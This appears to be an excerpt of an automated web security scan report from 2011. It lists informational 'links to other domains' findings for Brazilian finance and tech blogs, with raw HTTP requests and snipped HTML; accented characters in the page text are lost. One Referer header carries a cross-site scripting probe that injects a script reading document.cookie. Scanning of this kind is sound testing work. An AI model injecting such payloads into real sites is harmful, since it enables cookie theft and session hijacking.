                                           <a href="http://www.hotmoney.blog.br/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<span><a href="http://www.hotmoney.blog.br/" class="author_name">Hot Money</a>
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.riquezasdavida.blogspot.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<span><a href="http://www.riquezasdavida.blogspot.com/" class="author_name">Riquezas da Vida</a>
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.planetamoney.com.br/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<span><a href="http://www.planetamoney.com.br/" class="author_name">Planeta Money</a>
...[SNIP]...
<div class="avatar">
                           <a href="http://www.oguardiaodoseudinheiro.com.br/" target="_blank">
                           <span class="avatar">
...[SNIP]...
<div class="avatar">
                           <a href="http://ideiasefinancas.blogspot.com" target="_blank">
                           <span class="avatar">
...[SNIP]...
<div class="avatar">
                           <a href="http://blogs.diariodepernambuco.com.br/economia/" target="_blank">
                           <span class="avatar">
...[SNIP]...
<div class="avatar">
                           <a href="http://queroficarrico.com/blog/" target="_blank">
                           <span class="avatar">
...[SNIP]...
<div class="avatar">
                           <a href="http://www.betoveiga.com" target="_blank">
                           <span class="avatar">
...[SNIP]...
<a href="/quero-participar"><img src="http://financaspessoais.s3.amazonaws.com/theme/freshnews/be-a-blogger.jpg"/></a>
...[SNIP]...

15.8. http://financaspessoais.blog.br/financenetwork/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /financenetwork/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /financenetwork/?code=blogfinancas&nav_width=950 HTTP/1.1
Host: financaspessoais.blog.br
Proxy-Connection: keep-alive
Referer: http://financaspessoais.blog.br/?f8184%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec42c81b1212=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239951252.1295480312.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/51; __utma=239951252.1616361418.1295480312.1295480312.1295480312.1; __utmc=239951252; __utmb=239951252.1.10.1295480312

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 23:37:42 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
Content-Length: 3142
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="pt-br" xml:lang="pt-br" >
<head>
<meta ht
...[SNIP]...
<li><a target="_blank" href="http://financedesktop.com.br?utm_medium=link&utm_term=financedesktop&utm_campaign=financenetwork">Software FinanceDesktop</a>
...[SNIP]...
<li><a target="_blank" href="http://www.doutorfinancas.com.br?utm_medium=link&utm_term=doutorfinancas&utm_campaign=financenetwork">Doutor Finan..as</a>
...[SNIP]...
<li><a target="_blank" href="http://www.planetamoney.com.br?utm_medium=link&utm_term=planeta_money&utm_campaign=financenetwork">Planeta Money</a>
...[SNIP]...

15.9. http://gc.blog.br/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gc.blog.br
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?utm_source=horaextra.org&utm_medium=affiliate&utm_content=textlink&utm_campaign=horaextra HTTP/1.1
Host: gc.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:08:14 GMT
Server: Apache/2.2.10 (CentOS)
X-Pingback: http://gc.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105465

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<p>O <a href="http://duodra.co/post/seu-ambiente-de-trabalho-em-7-itens/" onclick="urchinTracker('/outgoing/duodra.co/post/seu-ambiente-de-trabalho-em-7-itens/?referer=');">Anderson Casimiro</a> (<a href="http://twitter.com/duodraco" onclick="urchinTracker('/outgoing/twitter.com/duodraco?referer=');">@duodraco</a>) come..ou um <a href="http://en.wikipedia.org/wiki/Internet_meme" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Internet_meme?referer=');">meme</a>
...[SNIP]...
/strong>. Nele voc.. escreve sobre quaisquer 7 coisas do seu ambiente de trabalho que achar mais interessantes e em seguida indica de 3 a 5 pesoas para fazerem o mesmo. O Anderson passou o meme para o <a href="http://ianntech.com.br/2010/12/18/meu-ambiente-de-trabalho-em-7-itens/" onclick="urchinTracker('/outgoing/ianntech.com.br/2010/12/18/meu-ambiente-de-trabalho-em-7-itens/?referer=');">Ivo Nascimento</a> (<a href="http://twitter.com/ivonascimento" onclick="urchinTracker('/outgoing/twitter.com/ivonascimento?referer=');">@ivonascimento</a>), que depois mandou para o <a href="http://www.brgomes.com/blog/meu-ambiente-de-trabalho-em-7-itens/" onclick="urchinTracker('/outgoing/www.brgomes.com/blog/meu-ambiente-de-trabalho-em-7-itens/?referer=');">Bruno Roberto Gomes</a> (<a href="http://twitter.com/brgomes" onclick="urchinTracker('/outgoing/twitter.com/brgomes?referer=');">@brgomes</a>) e por fim para o <a href="http://www.hlegius.pro.br/meu-ambiente-de-trabalho-em-7-itens/" onclick="urchinTracker('/outgoing/www.hlegius.pro.br/meu-ambiente-de-trabalho-em-7-itens/?referer=');">H..lio Costa</a> (<a href="http://twitter.com/hlegius" onclick="urchinTracker('/outgoing/twitter.com/hlegius?referer=');">@hlegius</a>
...[SNIP]...
<p>O <a href="http://git-scm.com" onclick="urchinTracker('/outgoing/git-scm.com?referer=');">Git</a>
...[SNIP]...
<p>O <a href="https://github.com/guilhermechapiewski/" onclick="urchinTracker('/outgoing/github.com/guilhermechapiewski/?referer=');">Github</a> faz o Git &#8211; que ja .. fant..stico &#8211; ficar ainda melhor. O Github mudou para melhor a forma de colabora....o entre desenvolvedores em projetos <a href="http://en.wikipedia.org/wiki/Open_source" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Open_source?referer=');">open source</a>. Basta voc.. criar um clone remoto do projeto que deseja contribuir, fazer suas altera....es e fazer um <a href="http://help.github.com/pull-requests/" onclick="urchinTracker('/outgoing/help.github.com/pull-requests/?referer=');">&#8220;pull request&#8221;</a>. Voc.. pode adicionar colaboradores nos seus reposit..rios ou at.. mesmo criar <a href="https://github.com/horaextra" onclick="urchinTracker('/outgoing/github.com/horaextra?referer=');">um time de colaboradores</a>. Isso .. mais ou menos o que as pessoas j.. faziam antes, <a href="http://www.eqqon.com/index.php/Collaborative_Github_Workflow" onclick="urchinTracker('/outgoing/www.eqqon.com/index.php/Collaborative_Github_Workflow?referer=');">o Github apenas entendeu esse processo e criou uma ferramenta excelente para suport..-lo com algumas melhorias</a>. E isso tudo n..o serve apenas para projetos abertos n..o, voc.. pode fazer como eu (e muita gente) e por <a href="https://github.com/plans" onclick="urchinTracker('/outgoing/github.com/plans?referer=');">alguns m..seros d..lares</a>
...[SNIP]...
<p>O <a href="http://code.google.com/appengine/" onclick="urchinTracker('/outgoing/code.google.com/appengine/?referer=');">Google App Engine</a> tamb..m .. um absurdo. Com ele voc.. pode desenvolver aplica....es <a href="http://code.google.com/appengine/docs/python/overview.html" onclick="urchinTracker('/outgoing/code.google.com/appengine/docs/python/overview.html?referer=');">Python</a> ou <a href="http://code.google.com/appengine/docs/java/overview.html" onclick="urchinTracker('/outgoing/code.google.com/appengine/docs/java/overview.html?referer=');">Java</a> num estalar de dedos e coloc..-las para funcionar numa infraestrutura bastante confi..vel e r..pida. O App Engine oferece banco de dados, cache, storage e <a href="http://code.google.com/appengine/docs/whatisgoogleappengine.html" onclick="urchinTracker('/outgoing/code.google.com/appengine/docs/whatisgoogleappengine.html?referer=');">v..rias coisas ..teis</a> que te ajudam a focar na sua aplica....o e esquecer a infraestrutura. Para os <a href="http://rubyonrails.org" onclick="urchinTracker('/outgoing/rubyonrails.org?referer=');">Railers</a> que l..em este blog, o <a href="http://heroku.com" onclick="urchinTracker('/outgoing/heroku.com?referer=');">Heroku</a>
...[SNIP]...
<p>O <a href="http://www.vmware.com/products/fusion/" onclick="urchinTracker('/outgoing/www.vmware.com/products/fusion/?referer=');">VMWare Fusion</a>
...[SNIP]...
ter v..rios sistemas operacionais com diferentes browsers para testar minhas aplica....es web em uma m..quina s... Al..m disso, como trabalho muitas vezes desenvolvendo coisas que ser..o servidas com <a href="http://www.redhat.com/rhel/" onclick="urchinTracker('/outgoing/www.redhat.com/rhel/?referer=');">Red Hat Enterprise Linux</a> ou <a href="http://www.centos.org" onclick="urchinTracker('/outgoing/www.centos.org?referer=');">CentOS</a>, posso facilmente criar ambientes de desenvolvimento locais com esses sistemas operacionais e continuar trabalhando no conforto do meu <a href="http://www.apple.com/macosx/" onclick="urchinTracker('/outgoing/www.apple.com/macosx/?referer=');">Mac</a>
...[SNIP]...
<p>Todo mundo tem seu editor preferido, e o meu .. o <a href="http://macromates.com" onclick="urchinTracker('/outgoing/macromates.com?referer=');">TextMate</a>
...[SNIP]...
linguagem que j.. precisei at.. hoje, suportar sistemas de controle de vers..o, e por a.. vai. Infelizmente n..o consigo us..-lo para todas as linguagens que trabalho. Por exemplo, quando programo em <a href="http://java.sun.com" onclick="urchinTracker('/outgoing/java.sun.com?referer=');">Java</a> ainda prefiro usar o <a href="http://www.eclipse.org" onclick="urchinTracker('/outgoing/www.eclipse.org?referer=');">Eclipse</a>, ou o <a href="http://developer.apple.com/technologies/tools/xcode.html" onclick="urchinTracker('/outgoing/developer.apple.com/technologies/tools/xcode.html?referer=');">XCode</a> para brincar com <a href="http://developer.apple.com/technologies/ios/" onclick="urchinTracker('/outgoing/developer.apple.com/technologies/ios/?referer=');">iOS</a>, mas para todo o resto uso o TextMate (ou, quando em servidores remotos, o <a href="http://www.vim.org" onclick="urchinTracker('/outgoing/www.vim.org?referer=');">Vim</a>
...[SNIP]...
<p>N..o tem como sobreviver sem um <a href="http://en.wikipedia.org/wiki/Unix_shell" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Unix_shell?referer=');">shell</a>. Eu costumo usar o Terminal do <a href="http://www.apple.com/macosx/" onclick="urchinTracker('/outgoing/www.apple.com/macosx/?referer=');">Mac OS X</a> com algumas customiza....es, e como shell uso o <a href="http://en.wikipedia.org/wiki/Bash_%28Unix_shell%29" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Bash_28Unix_shell_29?referer=');">Bash</a>
...[SNIP]...
l para algumas tarefas de desenvolvimento como usar o Git (incluindo resolver conflitos, prefiro fazer manualmente), buscar arquivos, inspecionar minha m..quina e por a.. vai. Tamb..m costumo escrever <a href="http://en.wikipedia.org/wiki/Shell_script" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Shell_script?referer=');">shell scripts</a> para fazer algumas tarefas pessoais como codificar v..deos com <a href="http://ffmpeg.org" onclick="urchinTracker('/outgoing/ffmpeg.org?referer=');">ffmpeg</a>
...[SNIP]...
<p>Os <a href="http://www.apple.com/mac/" onclick="urchinTracker('/outgoing/www.apple.com/mac/?referer=');">Macs</a>
...[SNIP]...
nciona e deixa o caminho livre para que eu possa trabalhar. J.. se foi a ..poca em que eu tinha tempo para comprar pe..a por pe..a e montar meu pr..prio computador, ou ent..o ficar re-configurando meu <a href="http://en.wikipedia.org/wiki/Xorg.conf" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Xorg.conf?referer=');">xorg.conf</a>
...[SNIP]...
display do MacBook (porque .. gigante). Se voc.. nunca tentou usar dois monitores, n..o perca mais tempo e tente agora, voc.. vai ver a diferen..a. Quanto ao mouse e teclado, durante muito tempo usei <a href="http://www.microsoft.com/hardware/mouseandkeyboard/default.mspx" onclick="urchinTracker('/outgoing/www.microsoft.com/hardware/mouseandkeyboard/default.mspx?referer=');">hardware Microsoft</a> (ali..s, isso eles fazem bem) mas recentemente tenho usado o <a href="http://www.apple.com/magicmouse/" onclick="urchinTracker('/outgoing/www.apple.com/magicmouse/?referer=');">Magic Mouse</a> e um <a href="http://store.apple.com/us/product/MC184LL/A" onclick="urchinTracker('/outgoing/store.apple.com/us/product/MC184LL/A?referer=');">mini teclado sem fio</a>, ambos da <a href="http://www.apple.com" onclick="urchinTracker('/outgoing/www.apple.com?referer=');">Apple</a>
...[SNIP]...
<li><a href="http://akitaonrails.com" onclick="urchinTracker('/outgoing/akitaonrails.com?referer=');">Fabio Akita</a> (<a href="http://twitter.com/akitaonrails" onclick="urchinTracker('/outgoing/twitter.com/akitaonrails?referer=');">@akitaonrails</a>
...[SNIP]...
<li><a href="http://fabiokung.com" onclick="urchinTracker('/outgoing/fabiokung.com?referer=');">Fabio Kung</a> (<a href="http://twitter.com/fabiokung" onclick="urchinTracker('/outgoing/twitter.com/fabiokung?referer=');">@fabiokung</a>
...[SNIP]...
<li><a href="http://gabrielfalcao.com" onclick="urchinTracker('/outgoing/gabrielfalcao.com?referer=');">Gabriel Falc..o</a> (<a href="http://twitter.com/gabrielfalcao" onclick="urchinTracker('/outgoing/twitter.com/gabrielfalcao?referer=');">@gabrielfalcao</a>
...[SNIP]...
<li><a href="http://henriquebastos.net" onclick="urchinTracker('/outgoing/henriquebastos.net?referer=');">Henrique Bastos</a> (<a href="http://twitter.com/henriquebastos" onclick="urchinTracker('/outgoing/twitter.com/henriquebastos?referer=');">@henriquebastos</a>
...[SNIP]...
<li><a href="http://blog.aspercom.com.br" onclick="urchinTracker('/outgoing/blog.aspercom.com.br?referer=');">Rodrigo Yoshima</a> (<a href="http://twitter.com/rodrigoy" onclick="urchinTracker('/outgoing/twitter.com/rodrigoy?referer=');">@rodrigoy</a>
...[SNIP]...
<p>Estamos contratando desenvolvedores para o <a href="http://www.yahoo.com.br" onclick="urchinTracker('/outgoing/www.yahoo.com.br?referer=');">Yahoo! Brasil</a>
...[SNIP]...
<p>Nosso time .. respons..vel pelo desenvolvimento e manuten....o do <a href="http://meme.yahoo.com" onclick="urchinTracker('/outgoing/meme.yahoo.com?referer=');">Yahoo! Meme</a>. Para trabalhar conosco .. imprescind..vel ser faixa preta em <a href="http://python.org" onclick="urchinTracker('/outgoing/python.org?referer=');">Python</a>, <a href="http://php.net" onclick="urchinTracker('/outgoing/php.net?referer=');">PHP</a> ou <a href="http://en.wikipedia.org/wiki/JavaScript" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/JavaScript?referer=');">JavaScript</a>
...[SNIP]...
<p>T..o ou mais importante do que isso .. ter ..timos conhecimentos sobre <a href="http://en.wikipedia.org/wiki/Agile_software_development" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Agile_software_development?referer=');">desenvolvimento ..gil</a> (especialmente <a href="http://en.wikipedia.org/wiki/Extreme_Programming" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Extreme_Programming?referer=');">XP</a>), conhecer ferramentas de <a href="http://en.wikipedia.org/wiki/Unit_testing" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Unit_testing?referer=');">testes unit..rios</a>, ser capaz de trabalhar com <a href="http://en.wikipedia.org/wiki/Test-driven_development" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Test-driven_development?referer=');">TDD</a>, entender sobre <a href="http://en.wikipedia.org/wiki/Continuous_integration" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Continuous_integration?referer=');">CI</a>
...[SNIP]...
</a> de rotinas/build/etc., melhores pr..ticas de desenvolvimento de software, <a href="http://en.wikipedia.org/wiki/Object-oriented_programming" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Object-oriented_programming?referer=');">Orienta....o .. Objetos</a>, <a href="http://en.wikipedia.org/wiki/Domain-driven_design" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Domain-driven_design?referer=');">Domain-Driven Design</a> e tudo mais que puder ser relevante para ajudar a construir software confi..vel e <a href="http://www.dicio.com.br/manutenivel/" onclick="urchinTracker('/outgoing/www.dicio.com.br/manutenivel/?referer=');">manuten..vel</a> de forma r..pida e com ritmo/qualidade sustent..vel. Experi..ncia com automatiza....o de testes com <a href="http://seleniumhq.org" onclick="urchinTracker('/outgoing/seleniumhq.org?referer=');">Selenium ou Webdriver</a> tamb..m .. essencial. Como trabalhamos com web, tamb..m .. necess..rio ter conhecimento em <a href="http://en.wikipedia.org/wiki/HTML" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/HTML?referer=');">HTML</a>, <a href="http://en.wikipedia.org/wiki/Cascading_Style_Sheets" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Cascading_Style_Sheets?referer=');">CSS</a> e desenvolvimento de aplica....es <a href="http://en.wikipedia.org/wiki/Cross-browser" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Cross-browser?referer=');">cross-browser</a>
...[SNIP]...
produtos de escala mundial, .. necess..rio ter experi..ncia com aplica....es de alta performance e disponibilidade, identifica....o e otimiza....o de gargalos de performance, escalabilidade, caching e <a href="http://en.wikipedia.org/wiki/Shard_%28database_architecture%29" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Shard_28database_architecture_29?referer=');">sharding</a>. .. importante tamb..m ter bons conhecimentos de pelo menos um tipo de <a href="http://en.wikipedia.org/wiki/Unix" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Unix?referer=');">Unix</a>
...[SNIP]...
<p>Conhecimentos em <a href="http://en.wikipedia.org/wiki/C_(programming_language)" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/C_programming_language?referer=');">C</a>, <a href="http://en.wikipedia.org/wiki/C%2B%2B" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/C_2B_2B?referer=');">C++</a>, <a href="http://en.wikipedia.org/wiki/Service-oriented_architecture" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Service-oriented_architecture?referer=');">arquitetura de servi..os</a>, desenvolvimento de <a href="http://en.wikipedia.org/wiki/Mashup_%28web_application_hybrid%29" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Mashup_28web_application_hybrid_29?referer=');">mashups</a>, experi..ncia com uso e desenvolvimento de <a href="http://www.programmableweb.com/apis" onclick="urchinTracker('/outgoing/www.programmableweb.com/apis?referer=');">APIs</a> (<a href="http://en.wikipedia.org/wiki/REST" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/REST?referer=');">REST</a>, <a href="http://developer.yahoo.com/yql/" onclick="urchinTracker('/outgoing/developer.yahoo.com/yql/?referer=');">YQL</a>, etc.) e experi..ncia em desenvolvimento para <a href="http://developer.apple.com/devcenter/ios/index.action" onclick="urchinTracker('/outgoing/developer.apple.com/devcenter/ios/index.action?referer=');">iPhone/iPad</a>
...[SNIP]...
<p>A empresa oferece contrata....o apenas por CLT e benef..cios como plano de sa..de e vale refei....o. Estamos localizados na <a href="http://maps.google.com/maps?rls=en&#038;q=rua+fidencio+ramos+sao+paulo&#038;oe=UTF-8&#038;um=1&#038;ie=UTF-8&#038;hq=&#038;hnear=R.+Fid..ncio+Ramos+-+Itaim+Bibi,+S..o+Paulo+-+SP,+04551-010,+Brasil" onclick="urchinTracker('/outgoing/maps.google.com/maps?rls=en_038_q=rua+fidencio+ramos+sao+paulo_038_oe=UTF-8_038_um=1_038_ie=UTF-8_038_hq=_038_hnear=R.+Fid_ncio+Ramos+-+Itaim+Bibi_+S_o+Paulo+-+SP_+04551-010_+Brasil&amp;referer=');">Vila Ol..mpia em S..o Paulo</a>
...[SNIP]...
<strong>Se voc.. se encaixa neste perfil, envie seu curriculo em ingl..s para mim (gc AT yahoo-inc.com) com uma lista dos ..ltimos 3 livros t..cnicos que leu. N..o esque..a de colocar links para o seu <a href="http://twitter.com" onclick="urchinTracker('/outgoing/twitter.com?referer=');">Twitter</a>, <a href="http://linkedin.com" onclick="urchinTracker('/outgoing/linkedin.com?referer=');">LinkedIn</a>, <a href="http://github.com" onclick="urchinTracker('/outgoing/github.com?referer=');">GitHub</a>
...[SNIP]...
ir para l.., mas primeiro queria ver se eles n..o estavam com fila de espera tamb..m. Quando entrei no site do restaurante para pegar o telefone e ligar&#8230; n..o funcionou porque o site .. feito em <a href="http://www.adobe.com/products/flashplayer/" onclick="urchinTracker('/outgoing/www.adobe.com/products/flashplayer/?referer=');">Flash</a> &#8211; que n..o funciona no <a href="http://www.apple.com/iphone/" onclick="urchinTracker('/outgoing/www.apple.com/iphone/?referer=');">iPhone</a>.</p>
<p>Quem me acompanha no <a href="http://twitter.com/gchapiewski" onclick="urchinTracker('/outgoing/twitter.com/gchapiewski?referer=');">Twitter</a> j.. deve ter percebido h.. tempos que eu n..o sou muito f.. de Flash, mas quando eu fa..o os meus &#8220;<a href="http://en.wikipedia.org/wiki/Rant" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Rant?referer=');">rants</a>
...[SNIP]...
<p>Se f..ssemos discutir esse epis..dio do ponto de vista do usu..rio, a primeira coisa que algu..m falaria seria &#8220;ah, voc.. deveria ter um <a href="http://www.android.com" onclick="urchinTracker('/outgoing/www.android.com?referer=');">Android</a>
...[SNIP]...
<p>A maioria das informa....es dos sites em Flash ficam dentro de um arquivo compilado que n..o .. lido pelos &#8220;<a href="http://pt.wikipedia.org/wiki/Web_crawler" onclick="urchinTracker('/outgoing/pt.wikipedia.org/wiki/Web_crawler?referer=');">crawlers</a>
...[SNIP]...
<p>Pessoas com defici..ncia visual utilizam &#8220;<a href="http://www.disabled-world.com/assistivedevices/computer/screen-readers.php" onclick="urchinTracker('/outgoing/www.disabled-world.com/assistivedevices/computer/screen-readers.php?referer=');">screen readers</a>
...[SNIP]...
ituem a barra de rolagem nativa do navegador por uma espec..fica do Flash. Esse sim .. um problema terr..vel, porque at.. o scroll do mouse para de funcionar. Quer ver como .. perturbador? Ent..o veja <a href="http://www.upfrontstage.com.br" onclick="urchinTracker('/outgoing/www.upfrontstage.com.br?referer=');">este site</a>
...[SNIP]...
<p>Veja <a href="http://www.modamercatto.com.br" onclick="urchinTracker('/outgoing/www.modamercatto.com.br?referer=');">este site</a>. Eu que n..o sou nenhum especialista em <a href="http://en.wikipedia.org/wiki/User_experience" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/User_experience?referer=');">UX</a>
...[SNIP]...
anda fizeram com que o trackpad do meu notebook n..o funcione corretamente, proporcionando assim a maneira mais lenta e tediosa poss..vel de rolar para achar a informa....o que eu preciso. Agora veja <a href="http://www.espacofashion.com.br" onclick="urchinTracker('/outgoing/www.espacofashion.com.br?referer=');">este outro site</a>
...[SNIP]...
<p>Sites em Flash n..o funcionam em <a href="http://www.apple.com/iphone/" onclick="urchinTracker('/outgoing/www.apple.com/iphone/?referer=');">iPhones</a> e <a href="http://www.apple.com/ipad/" onclick="urchinTracker('/outgoing/www.apple.com/ipad/?referer=');">iPads</a>
...[SNIP]...
siva de aparelhos. Assim como voc.. se preocupa em desenvolver sites compat..veis com v..rios navegadores, voc.. precisa se preocupar com dispositivos m..veis. Seria muito mais f..cil desenvolver para <a href="http://br.mozdev.org" onclick="urchinTracker('/outgoing/br.mozdev.org?referer=');">Firefox</a> somente, mas infelizmente h.. um grande n..mero de usu..rios que usam <a href="http://www.microsoft.com/brasil/windows/internet-explorer/" onclick="urchinTracker('/outgoing/www.microsoft.com/brasil/windows/internet-explorer/?referer=');">Internet Explorer</a> (incluindo <a href="http://ie6update.com" onclick="urchinTracker('/outgoing/ie6update.com?referer=');">IE6</a>
...[SNIP]...
<p>Existem um monte de ferramentas que te permitem criar sites funcionais, r..pidos, acess..veis e eficientes. Mais recentemente com o <a href="http://pt.wikipedia.org/wiki/HTML5" onclick="urchinTracker('/outgoing/pt.wikipedia.org/wiki/HTML5?referer=');">HTML5</a>, muitas das coisas que antes s.. eram poss..veis com Flash (ou <a href="http://silverlight.net" onclick="urchinTracker('/outgoing/silverlight.net?referer=');">Silverlight</a>
...[SNIP]...
<p>H.. n..o muito tempo uma pessoa me procurou no <a href="http://en.wikipedia.org/wiki/Instant_messaging" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Instant_messaging?referer=');">IM</a> para conversar sobre sua carreira. Ela me disse que no momento estava fazendo um curso de <a href="http://www.java.com" onclick="urchinTracker('/outgoing/www.java.com?referer=');">Java</a> e me perguntou o que exatamente ela precisava para trabalhar numa empresa como o <a href="http://yahoo.com" onclick="urchinTracker('/outgoing/yahoo.com?referer=');">Yahoo!</a>
...[SNIP]...
ntes s.. est..o dispon..veis em ingl..s. Poucos t..tulos s..o traduzidos e quando s..o levam alguns meses (ou anos) para tal, isso sem contar que as tradu....es muitas vezes s..o ruins. Por exemplo, o <a href="http://www.amazon.com/Domain-Driven-Design-Tackling-Complexity-Software/dp/0321125215/" onclick="urchinTracker('/outgoing/www.amazon.com/Domain-Driven-Design-Tackling-Complexity-Software/dp/0321125215/?referer=');"><em>
...[SNIP]...
</a> do <a href="http://domaindrivendesign.org/about" onclick="urchinTracker('/outgoing/domaindrivendesign.org/about?referer=');">Eric Evans</a> levou aproximadamente 5 anos para ser traduzido, o <a href="http://www.amazon.com/Patterns-Enterprise-Application-Architecture-Martin/dp/0321127420/" onclick="urchinTracker('/outgoing/www.amazon.com/Patterns-Enterprise-Application-Architecture-Martin/dp/0321127420/?referer=');"><em>
...[SNIP]...
</a> do <a href="http://martinfowler.com" onclick="urchinTracker('/outgoing/martinfowler.com?referer=');">Martin Fowler</a>
...[SNIP]...
</a>), mas grandes nomes como <a href="http://www.objectmentor.com/omTeam/martin_r.html" onclick="urchinTracker('/outgoing/www.objectmentor.com/omTeam/martin_r.html?referer=');">Robert Martin</a>, <a href="http://alistair.cockburn.us" onclick="urchinTracker('/outgoing/alistair.cockburn.us?referer=');">Alistair Cockburn</a>, <a href="http://www.threeriversinstitute.org/blog/" onclick="urchinTracker('/outgoing/www.threeriversinstitute.org/blog/?referer=');">Kent Beck</a> &#8211; e mais algumas dezenas que eu poderia citar &#8211; escrevem em ingl..s. Isso sem contar as d..zias de blogs como o <a href="http://techcrunch.com" onclick="urchinTracker('/outgoing/techcrunch.com?referer=');">TechCrunch</a>, <a href="http://mashable.com" onclick="urchinTracker('/outgoing/mashable.com?referer=');">Mashable</a>, <a href="http://highscalability.com/blog/" onclick="urchinTracker('/outgoing/highscalability.com/blog/?referer=');">High Scalability</a> ou at.. mesmo o <a href="http://xkcd.com" onclick="urchinTracker('/outgoing/xkcd.com?referer=');">xkcd</a>
...[SNIP]...
<p>Em terceiro lugar, a maioria dos projetos Open Source relevantes s..o em ingl..s. Por exemplo, voc.. est.. acompanhando o desenvolvimento do <a href="http://nodejs.org" onclick="urchinTracker('/outgoing/nodejs.org?referer=');">Node.js</a>? Voc.. j.. estudou <a href="http://clojure.org" onclick="urchinTracker('/outgoing/clojure.org?referer=');">Clojure</a>? E o <a href="http://rubyonrails.org" onclick="urchinTracker('/outgoing/rubyonrails.org?referer=');">Rails 3</a>? <a href="http://en.wikipedia.org/wiki/Linux" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Linux?referer=');">Linux</a>? <a href="http://python.org" onclick="urchinTracker('/outgoing/python.org?referer=');">Python</a>? Projetos da <a href="http://apache.org" onclick="urchinTracker('/outgoing/apache.org?referer=');">Apache Foundation</a>
...[SNIP]...
<p>Existe um mito de que n..o se documenta em projetos que usam <a href="http://pt.wikipedia.org/wiki/Desenvolvimento_%C3%A1gil_de_software" onclick="urchinTracker('/outgoing/pt.wikipedia.org/wiki/Desenvolvimento_C3_A1gil_de_software?referer=');">metodologias de desenvolvimento ..gil</a>
...[SNIP]...
<p>A grande diferen..a entre projetos <a href="http://en.wikipedia.org/wiki/Waterfall_model" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Waterfall_model?referer=');">&#8220;tradicionais&#8221;</a>
...[SNIP]...
esso (que geralmente .. muita coisa). Voc.. n..o pensa no que est.. fazendo, simplesmente segue o que foi definido e escreve documentos. Em m..todos ..geis n..o h.. prescri....o de documenta....o (e o <a href="http://agilemanifesto.org" onclick="urchinTracker('/outgoing/agilemanifesto.org?referer=');">manifesto ..gil fala tamb..m sobre &#8220;software funcionando mais do que documenta....o&#8221;</a>
...[SNIP]...
<p>Assim como voc.. deve <a href="http://www.artima.com/intv/simplest2.html" onclick="urchinTracker('/outgoing/www.artima.com/intv/simplest2.html?referer=');">implementar apenas o necess..rio para entregar uma funcionalidade e n..o mais do que isso</a>
...[SNIP]...
<p>Documentar tem que ser r..pido, n..o pode dar trabalho. Use ferramentas como <a href="http://en.wikipedia.org/wiki/Wiki" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Wiki?referer=');">wikis</a>, <a href="http://en.wikipedia.org/wiki/Documentation_generator" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Documentation_generator?referer=');">geradores de documenta....o</a> (como o <a href="http://sphinx.pocoo.org" onclick="urchinTracker('/outgoing/sphinx.pocoo.org?referer=');">Sphinx</a>
...[SNIP]...
